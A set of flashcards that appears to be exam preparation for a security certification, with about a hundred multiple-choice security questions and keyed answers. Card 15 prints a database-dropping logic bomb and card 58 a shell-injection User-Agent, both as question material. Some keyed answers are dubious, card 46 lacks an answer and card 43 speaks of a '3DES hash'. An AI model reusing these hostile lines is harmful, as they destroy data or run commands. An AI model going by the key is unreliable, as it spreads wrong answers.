Study Guide 301-400 Flashcards
(100 cards)
1
Q
A security officer is implementing a security awareness program and has placed security-themed posters around the building and assigned online user training. Which of the following will the security officer most likely implement?
A. Password policy B. Access badges C. Phishing campaign D. Risk assessment
A
C. Phishing campaign
2
Q
A malicious update was distributed to a common software platform and disabled services at many organizations. Which of the following best describes this type of vulnerability?
A. DDoS attack B. Rogue employee C. Insider threat D. Supply chain
A
D. Supply chain
3
Q
A company web server is initiating outbound traffic to a low-reputation, public IP on non-standard pat. The web server is used to present an unauthenticated page to clients who upload images the company. An analyst notices a suspicious process running on the server hat was not created by the company development team. Which of the following is the most likely explanation for his security incident?
A. A web shell has been deployed to the server through the page. B. A vulnerability has been exploited to deploy a worm to the server. C. Malicious insiders are using the server to mine cryptocurrency. D. Attackers have deployed a rootkit Trojan to the server over an exposed RDP port.
A
A. A web shell has been deployed to the server through the page
4
Q
An organization requests a third-party full-spectrum analysis of its supply chain. Which of the following would the analysis team use to meet this requirement?
A. Vulnerability scanner B. Penetration test C. SCAP D. Illumination tool
A
D. Illumination tool
5
Q
A systems administrator deployed a monitoring solution that does not require installation on the endpoints that the solution is monitoring. Which of the following is described in this scenario?
A. Agentless solution B. Client-based soon C. Open port D. File-based solution
A
A. Agentless solution
6
Q
A security analyst is reviewing the source code of an application in order to identify misconfigurations and vulnerabilities. Which of the following kinds of analysis best describes this review?
A. Dynamic B. Static C. Gap D. Impact
A
B. Static
7
Q
Which of the following agreement types is used to limit external discussions?
A. BPA B. NDA C. SLA D. MSA
A
B. NDA
8
Q
A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the SaaS vendor. Which of the following processes is the analyst most likely conducting?
A. Internal audit B. Penetration testing C. Attestation D. Due diligence
A
D. Due diligence
9
Q
Which of the following is used to conceal credit card information in a database log file?
A. Tokenization B. Masking C. Hashing D. Obfuscation
A
B. Masking
10
Q
A systems administrator is configuring a site-to-site VPN between two branch offices. Some of the settings have already been configured correctly. The systems administrator has been provided the following requirements as part of completing the configuration:
- Most secure algorithms should be selected
- All traffic should be encrypted over the VPN
- A secret password will be used to authenticate the two VPN concentrators
Click on the two VPN Concentrators to configure the appropriate settings.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Refer to picture
A
Refer to picture
11
Q
An organization recently started hosting a new service that customers access through a web portal. A security engineer needs to add to the existing security devices a new solution to protect this new service. Which of the following is the engineer most likely to deploy?
A. Layer 4 firewall B. NGFW C. WAF D. UTM
A
C. WAF
12
Q
Which of the following topics would most likely be included within an organization’s SDLC?
A. Service-level agreements B. Information security policy C. Penetration testing methodology D. Branch protection requirements
A
D. Branch protection requirements
13
Q
Which of the following control types is AUP an example of?
A. Physical B. Managerial C. Technical D. Operational
A
B. Managerial
14
Q
An organization is adopting cloud services at a rapid pace and now has multiple SaaS applications in use. Each application has a separate log-in, so the security team wants to reduce the number of credentials each employee must maintain. Which of the following is the first step the security team should take?
A. Enable SAML. B. Create OAuth tokens. C. Use password vaulting. D. Select an IdP.
A
D. Select an IdP
15
Q
A company’s online shopping website became unusable shortly after midnight on January 30, 2023. When a security analyst reviewed the database server, the analyst noticed the following code used for backing up data:
IF DATE() = “01/30/2023” THEN BEGIN DROP DATABASE WebShopOnline; END
Which of the following should the analyst do next?
A. Check for recently terminated DBAs. B. Review WAF logs for evidence of command injection. C. Scan the database server for malware. D. Search the web server for ransomware notes.
A
A. Check for recently terminated DBAs
16
Q
Which of the following would be the best way to test resiliency in the event of a primary power failure?
A. Parallel processing B. Tabletop exercise C. Simulation testing D. Production failover
A
D. Production failover
17
Q
Which of the following would be the most appropriate way to protect data in transit?
A. SHA-256 B. SSL3.0 C. TLS 1.3 D. AES-256
A
C. TLS 1.3
18
Q
Which of the following is a common, passive reconnaissance technique employed by penetration testers in the early phases of an engagement?
A. Open-source intelligence B. Port scanning C. Pivoting D. Exploit validation
A
A. Open-source intelligence
19
Q
Which of the following threat actors is the most likely to seek financial gain through the use of ransomware attacks?
A. Organized crime B. Insider threat C. Nation-state D. Hacktivists
A
A. Organized crime
20
Q
Which of the following would a systems administrator follow when upgrading the firmware of an organization’s router?
A. Software development life cycle B. Risk tolerance C. Certificate signing request D. Maintenance window
A
D. Maintenance window
21
Q
The security team has been asked to only enable host A (10.2.2.7) and host B (10.3.9.9) to the new isolated network segment (10.9.8.14) that provides access to legacy devices.
Access from all other hosts should be blocked. Which of the following entries would need to be added on the firewall?
A.Permit 10.2.2.2.0/24 to 10.9.8.14/27 Permit 10.3.9.0/24 to 10.9.8.14/27 Deny 0.0.0.0/0 to 10.9.8.14/27 B.Deny 0.0.0.0/0 to 10.9.8.14/27 Permit 10.2.2.0/24 to 10.9.8.14/27 Permit 10.3.9.0/24 to 10.9.8.14/27 C.Permit 10.2.2.7/32 to 10.9.8.14/27 Permit 10.3.9.9/32 to 10.9.8.14/27 Deny 0.0.0.0/0 to 10.9.8.14/27
D. Permit 10.2.2.7/32 to 10.9.8.14/27
Permit 10.3.9.0/24 to 10.9.8.14/27
Deny 10.9.8.14/27 to 0.0.0.0/0
A
C.Permit 10.2.2.7/32 to 10.9.8.14/27
Permit 10.3.9.9/32 to 10.9.8.14/27
Deny 0.0.0.0/0 to 10.9.8.14/27
22
Q
A security analyst is creating the first draft of a network diagram for the company’s new customer-facing payment application that will be hosted by a third-party cloud service provider.
Click the ? to select the appropriate icons to create a secure, redundant web application. Then use the dropdown menu to select the appropriate subnet type. Every space in the diagram must be filled.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A
Refer to picture
23
Q
A systems administrator needs to ensure the secure communication of sensitive data within the organization’s private cloud. Which of the following is the best choice for the administrator to implement?
A. IPSec B. SHA-1 C. RSA D. TGT
A
A. IPSec
24
Q
Which of the following should an internal auditor check for first when conducting an audit of the organization’s risk management program?
A. Policies and procedures B. Asset management C. Vulnerability assessment D. Business impact analysis
A
A. Policies and procedures
25
Which of the following activities are associated with vulnerability management? (Choose two.)
A. Reporting
B. Prioritization
C. Exploiting
D. Correlation
E. Containment
F. Tabletop exercise
A. Reporting
B. Prioritization
26
An administrator wants to perform a risk assessment without using proprietary company information. Which of the following methods should the administrator use to gather information?
A. Network scanning
B. Penetration testing
C. Open-source intelligence
D. Configuration auditing
C. Open-source intelligence
27
A systems administrator is concerned about vulnerabilities within cloud computing instances. Which of the following is most important for the administrator to consider when architecting a cloud computing environment?
A. SQL injection
B. TOC/TOU
C. VM escape
D. Tokenization
E. Password spraying
C. VM escape
28
A database administrator is updating the company’s SQL database, which stores credit card information for pending purchases. Which of the following is the best method to secure the data against a potential breach?
A. Hashing
B. Obfuscation
C. Tokenization
D. Masking
C. Tokenization
29
Which of the following is a benefit of vendor diversity?
A. Patch availability
B. Zero-day resiliency
C. Secure configuration guide applicability
D. Load balancing
B. Zero-day resiliency
30
An employee used a company’s billing system to issue fraudulent checks. The administrator is looking for evidence of other occurrences of this activity. Which of the following should the administrator examine?
A. Application logs
B. Vulnerability scanner logs
C. IDS/IPS logs
D. Firewall logs
A. Application logs
31
An organization is looking to optimize its environment and reduce the number of patches necessary for operating systems. Which of the following will best help to achieve this objective?
A. Microservices
B. Virtualization
C. Real-time operating system
D. Containers
D. Containers
32
Which of the following tasks is typically included in the BIA process?
A. Estimating the recovery time of systems
B. Identifying the communication strategy
C. Evaluating the risk management plan
D. Establishing the backup and recovery procedures
E. Developing the incident response plan
A. Estimating the recovery time of systems
33
Which of the following is a risk of conducting a vulnerability assessment?
A. A disruption of business operations
B. Unauthorized access to the system
C. Reports of false positives
D. Finding security gaps in the system
A. A disruption of business operations
34
Which of the following techniques would attract the attention of a malicious attacker in an insider threat scenario?
A. Creating a false text file in /docs/salaries
B. Setting weak passwords in /etc/shadow
C. Scheduling vulnerable jobs in /etc/crontab
D. Adding a fake account to /etc/passwd
A. Creating a false text file in /docs/salaries
35
An organization maintains intellectual property that it wants to protect. Which of the following concepts would be most beneficial to add to the company’s security awareness training program?
A. Insider threat detection
B. Simulated threats
C. Phishing awareness
D. Business continuity planning
A. Insider threat detection
36
An organization plans to expand its operations internationally and needs to keep data at the new location secure. The organization wants to use the most secure architecture model possible. Which of the following models offers the highest level of security?
A. Cloud-based
B. Peer-to-peer
C. On-premises
D. Hybrid
C. On-premises
37
Which of the following is the most relevant reason a DPO would develop a data inventory?
A. To manage data storage requirements better
B. To determine the impact in the event of a breach
C. To extend the length of time data can be retained
D. To automate the reduction of duplicated data
B. To determine the impact in the event of a breach
38
Which of the following cryptographic solutions protects data at rest?
A. Digital signatures
B. Full disk encryption
C. Private key
D. Steganography
B. Full disk encryption
39
Which of the following should an organization use to protect its environment from external attacks conducted by an unauthorized hacker?
A. ACL
B. IDS
C. HIDS
D. NIPS
D. NIPS
40
Which of the following would enable a data center to remain operational through a multiday power outage?
A. Generator
B. Uninterruptible power supply
C. Replication
D. Parallel processing
A. Generator
41
A company installed cameras and added signs to alert visitors that they are being recorded. Which of the following controls did the company implement? (Choose two.)
A. Directive
B. Deterrent
C. Preventive
D. Detective
E. Corrective
F. Technical
B. Deterrent
D. Detective
42
Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when needed?
A. Public key infrastructure
B. Open public ledger
C. Public key encryption
D. Key escrow
D. Key escrow
43
For which of the following reasons would a systems administrator leverage a 3DES hash from an installer file that is posted on a vendor’s website?
A. To test the integrity of the file
B. To validate the authenticity of the file
C. To activate the license for the file
D. To calculate the checksum of the file
A. To test the integrity of the file
44
A company is redesigning its infrastructure and wants to reduce the number of physical servers in use. Which of the following architectures is best suited for this goal?
A. Isolation
B. Segmentation
C. Virtualization
D. Redundancy
C. Virtualization
45
Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?
A. Availability
B. Non-repudiation
C. Integrity
D. Confidentiality
A. Availability
46
A security manager created new documentation to use in response to various types of security incidents. Which of the following is the next step the manager should take?
A. Set the maximum data retention policy.
B. Securely store the documents on an air-gapped network.
C. Review the documents’ data classification policy.
D. Conduct a tabletop exercise with the team.
47
After failing an audit twice, an organization has been ordered by a government regulatory agency to pay fines. Which of the following causes this action?
A. Non-compliance
B. Contract violations
C. Government sanctions
D. Rules of engagement
A. Non-compliance
48
A company is developing a critical system for the government and storing project information on a fileshare. Which of the following describes how this data will most likely be classified? (Choose two.)
A. Private
B. Confidential
C. Public
D. Operational
E. Urgent
F. Restricted
B. Confidential
F. Restricted
49
Which of the following activities is included in the post-incident review phase?
A. Determining the root cause of the incident
B. Developing steps to mitigate the risks of the incident
C. Validating the accuracy of the evidence collected during the investigation
D. Reestablishing the compromised system’s configuration and settings
A. Determining the root cause of the incident
50
Which of the following attacks exploits a potential vulnerability as a result of using weak cryptographic algorithms?
A. Password cracking
B. On-path
C. Digital signing
D. Side-channel
A. Password cracking
51
Which of the following is a preventive physical security control?
A. Video surveillance system
B. Bollards
C. Alarm system
D. Motion sensors
B. Bollards
52
Which of the following is most likely to be used as a just-in-time reference document within a security operations center?
A. Change management policy
B. Risk profile
C. Playbook
D. SIEM profile
C. Playbook
53
A security engineer configured a remote access VPN. The remote access VPN allows end users to connect to the network by using an agent that is installed on the endpoint, which establishes an encrypted tunnel. Which of the following protocols did the engineer most likely implement?
A. GRE
B. IPSec
C. SD-WAN
D. EAP
B. IPSec
54
Executives at a company are concerned about employees accessing systems and information about sensitive company projects unrelated to the employees’ normal job duties. Which of the following enterprise security capabilities will the security team most likely deploy to detect that activity?
A. UBA
B. EDR
C. NAC
D. DLP
A. UBA
55
Several customers want an organization to verify its security controls are operating effectively and have requested an independent opinion. Which of the following is the most efficient way to address these requests?
A. Hire a vendor to perform a penetration test
B. Perform an annual self-assessment.
C. Allow each client the right to audit
D. Provide a third-party attestation report
D. Provide a third-party attestation report
56
A university employee logged on to the academic server and attempted to guess the system administrators’ log-in credentials. Which of the following security measures should the university have implemented to detect the employee’s attempts to gain access to the administrators’ accounts?
A. Two-factor authentication
B. Firewall
C. Intrusion prevention system
D. User activity logs
D. User activity logs
57
Which of the following consequences would a retail chain most likely face from customers in the event the retailer is non-compliant with PCI DSS?
A. Contractual impacts
B. Sanctions
C. Fines
D. Reputational damage
D. Reputational damage
58
A security analyst is reviewing logs and discovers the following:
149.32.228.10 -- [28/Jan/2023:16:32:45 -0300]
"GET/ HTTP /1.0"
User-Agent: ${/bin/sh/ id} 200 397
Which of the following should be used to best mitigate this type of attack?
A. Input sanitization
B. Secure cookies
C. Static code analysis
D. Sandboxing
A. Input sanitization
59
An administrator is installing an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verified with the issuing CA and has validated the private key. Which of the following should the administrator check for next?
A. If the wildcard certificate is configured
B. If the certificate signing request is valid
C. If the root certificate is installed
D. If the public key is configured
C. If the root certificate is installed
60
An employee emailed a new systems administrator a malicious web link and convinced the administrator to change the email server’s password. The employee used this access to remove the mailboxes of key personnel. Which of the following security awareness concepts would help prevent this threat in the future?
A. Recognizing phishing
B. Providing situational awareness training
C. Using password management
D. Reviewing email policies
A. Recognizing phishing
61
Which of the following strategies should an organization use to efficiently manage and analyze multiple types of logs?
A. Deploy a SIEM solution
B. Create custom scripts to aggregate and analyze logs.
C. Implement EDR technology.
D. Install a unified threat management appliance.
A. Deploy a SIEM solution
62
A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following activities should the company perform next?
A. Gap analysis
B. Policy review
C. Security procedure evaluation
D. Threat scope reduction
A. Gap analysis
62
An accountant is transferring information to a bank over FTP. Which of the following mitigations should the accountant use to protect the confidentiality of the data?
A. Tokenization
B. Data masking
C. Encryption
D. Obfuscation
C. Encryption
63
An organization has recently decided to implement SSO. The requirements are to leverage access tokens and focus on application authorization rather than user authentication. Which of the following solutions would the engineering team most likely configure?
A. LDAP
B. Federation
C. SAML
D. OAuth
D. OAuth
64
Which of the following would most likely be used by attackers to perform credential harvesting?
A. Social engineering
B. Supply chain compromise
C. Third-party software
D. Rainbow table
A. Social engineering
65
A security engineer would like to enhance the use of automation and orchestration within the SIEM. Which of the following would be the primary benefit of this enhancement?
A. It increases complexity.
B. It removes technical debt.
C. It adds additional guard rails.
D. It acts as a workforce multiplier.
D. It acts as a workforce multiplier.
66
A systems administrator receives an alert that a company’s internal file server is very slow and is only working intermittently. The systems administrator reviews the server management software and finds the following information about the server:
Refer to picture
Which of the following indicators most likely triggered this alert?
A. Concurrent session usage
B. Network saturation
C. Account lockout
D. Resource consumption
D. Resource consumption
67
Which of the following data states applies to data that is being actively processed by a database server?
A. In use
B. At rest
C. In transit
D. Being hashed
A. In use
68
Which of the following architectures is most suitable to provide redundancy for critical business processes?
A. Network-enabled
B. Server-side
C. Cloud-native
D. Multitenant
C. Cloud-native
69
After a security incident, a systems administrator asks the company to buy a NAC platform. Which of the following attack surfaces is the systems administrator trying to protect?
A. Bluetooth
B. Wired
C. NFC
D. SCADA
B. Wired
70
While reviewing logs, a security administrator identifies the following code:
Refer to picture
Which of the following best describes the vulnerability being exploited?
A. XSS
B. SQLi
C. DDoS
D. CSRF
A. XSS
71
An organization issued new laptops to all employees and wants to provide web filtering both in and out of the office without configuring additional access to the network. Which of the following types of web filtering should a systems administrator configure?
A. Agent-based
B. Centralized proxy
C. URL scanning
D. Content categorization
A. Agent-based
72
Which of the following provides the best protection against unwanted or insecure communications to and from a device?
A. System hardening
B. Host-based firewall
C. Intrusion detection system
D. Anti-malware software
B. Host-based firewall
73
Which of the following should be used to aggregate log data in order to create alerts and detect anomalous activity?
A. SIEM
B. WAF
C. Network taps
D. IDS
A. SIEM
74
Which of the following is the primary purpose of a service that tracks log-ins and time spent using the service?
A. Availability
B. Accounting
C. Authentication
D. Authorization
B. Accounting
75
An employee who was working remotely lost a mobile device containing company data. Which of the following provides the best solution to prevent future data loss?
A. MDM
B. DLP
C. FDE
D. EDR
A. MDM
76
An IT administrator needs to ensure data retention standards are implemented on an enterprise application. Which of the following describes the administrator’s role?
A. Processor
B. Custodian
C. Privacy officer
D. Owner
B. Custodian
77
A company plans to secure its systems by:
* Preventing users from sending sensitive data over corporate email
* Restricting access to potentially harmful websites
Which of the following features should the company set up? (Choose two.)
A. DLP software
B. DNS filtering
C. File integrity monitoring
D. Stateful firewall
E. Guardrails
F. Antivirus signatures
A. DLP software
B. DNS filtering
78
A company processes and stores sensitive data on its own systems. Which of the following steps should the company take first to ensure compliance with privacy regulations?
A. Implement access controls and encryption.
B. Develop and provide training on data protection policies.
C. Create incident response and disaster recovery plans.
D. Purchase and install security software.
A. Implement access controls and encryption.
79
Which of the following cryptographic methods is preferred for securing communications with limited computing resources?
A. Hashing algorithm
B. Public key infrastructure
C. Symmetric encryption
D. Elliptic curve cryptography
C. Symmetric encryption
80
A network administrator wants to ensure that network traffic is highly secure while in transit.
Which of the following actions best describes the actions the network administrator should take?
A. Ensure that NAC is enforced on all network segments, and confirm that firewalls have updated policies to block unauthorized traffic.
B. Ensure only TLS and other encrypted protocols are selected for use on the network, and only permit authorized traffic via secure protocols.
C. Configure the perimeter IPS to block inbound HTTPS directory traversal traffic, and verify that signatures are updated on a daily basis.
D. Ensure the EDR software monitors for unauthorized applications that could be used by threat actors, and configure alerts for the security team
B. Ensure only TLS and other encrypted protocols are selected for use on the network, and only permit authorized traffic via secure protocols.
81
An enterprise security team is researching a new security architecture to better protect the company’s networks and applications against the latest cyberthreats. The company has a fully remote workforce. The solution should be highly redundant and enable users to connect to a VPN with an integrated, software-based firewall. Which of the following solutions meets these requirements?
A. IPS
B. SIEM
C. SASE
D. CASB
C. SASE
82
Which of the following definitions best describes the concept of log correlation?
A. Combining relevant logs from multiple sources into one location
B. Searching and processing data to identify patterns of malicious activity
C. Making a record of the events that occur in the system
D. Analyzing the log files of the system components
B. Searching and processing data to identify patterns of malicious activity
83
Which of the following is the best way to validate the integrity and availability of a disaster recovery site?
A. Lead a simulated failover.
B. Conduct a tabletop exercise.
C. Periodically test the generators.
D. Develop requirements for database encryption.
A. Lead a simulated failover
84
Which of the following allows an exploit to go undetected by the operating system?
A. Firmware vulnerabilities
B. Side loading
C. Memory injection
D. Encrypted payloads
C. Memory injection
85
A malicious insider from the marketing team alters records and transfers company funds to a personal account. Which of the following methods would be the best way to secure company records in the future?
A. Permission restrictions
B. Hashing
C. Input validation
D. Access control list
A. Permission restrictions
86
An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best achieve the objective?
A. Red teaming
B. Penetration testing
C. Independent audit
D. Vulnerability assessment
C. Independent audit
87
A systems administrator successfully configures VPN access to a cloud environment. Which of the following capabilities should the administrator use to best facilitate remote administration?
A. A jump host in the shared services security zone
B. An SSH server within the corporate LAN
C. A reverse proxy on the firewall
D. An MDM solution with conditional access
A. A jump host in the shared services security zone
88
Which of the following best describes the concept of information being stored outside of its country of origin while still being subject to the laws and requirements of the country of origin?
A. Data sovereignty
B. Geolocation
C. Intellectual property
D. Geographic restrictions
A. Data sovereignty
89
An audit reveals that cardholder database logs are exposing account numbers inappropriately. Which of the following mechanisms would help limit the impact of this error?
A. Segmentation
B. Hashing
C. Journaling
D. Masking
D. Masking
90
A security analyst attempts to start a company's database server. When the server starts, the analyst receives an error message indicating the database server did not pass authentication. After reviewing and testing the system, the analyst receives confirmation that the server has been compromised and that attackers have redirected all outgoing database traffic to a server under their control. Which of the following MITRE ATT&CK techniques did the attacker most likely use to redirect database traffic?
A. Browser extension
B. Process injection
C. Valid accounts
D. Escape to host
C. Valid accounts
91
A penetration tester enters an office building at the same time as a group of employees despite not having an access badge. Which of the following attack types is the penetration tester performing?
A. Tailgating
B. Shoulder surfing
C. RFID cloning
D. Forgery
A. Tailgating
92
Which of the following enables the ability to receive a consolidated report from different devices on the network?
A. IPS
B. DLP
C. SIEM
D. Firewall
C. SIEM
93
Which of the following should an organization focus on the most when making decisions about vulnerability prioritization?
A. Exposure factor
B. CVSS
C. CVE
D. Industry impact
B. CVSS
94
An organization needs to monitor its users’ activities in order to prevent insider threats. Which of the following solutions would help the organization achieve this goal?
A. Behavioral analytics
B. Access control lists
C. Identity and access management
D. Network intrusion detection system
A. Behavioral analytics
95
A customer of a large company receives a phone call from someone claiming to work for the company and asking for the customer’s credit card information. The customer sees the caller ID is the same as the company's main phone number. Which of the following attacks is the customer most likely a target of?
A. Phishing
B. Whaling
C. Smishing
D. Vishing
D. Vishing
96
A security analyst is reviewing logs to identify the destination of command-and-control traffic originating from a compromised device within the on-premises network. Which of the following is the best log to review?
A. IDS
B. Antivirus
C. Firewall
D. Application
C. Firewall
97
Which of the following would most likely be deployed to obtain and analyze attacker activity and techniques?
A. Firewall
B. IDS
C. Honeypot
D. Layer 3 switch
C. Honeypot
98
When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate types is the site most likely using?
A. Wildcard
B. Root of trust
C. Third-party
D. Self-signed
D. Self-signed
99
Which of the following objectives is best achieved by a tabletop exercise?
A. Familiarizing participants with the incident response process
B. Deciding red and blue team rules of engagement
C. Quickly determining the impact of an actual security breach
D. Conducting multiple security investigations in parallel
A. Familiarizing participants with the incident response process
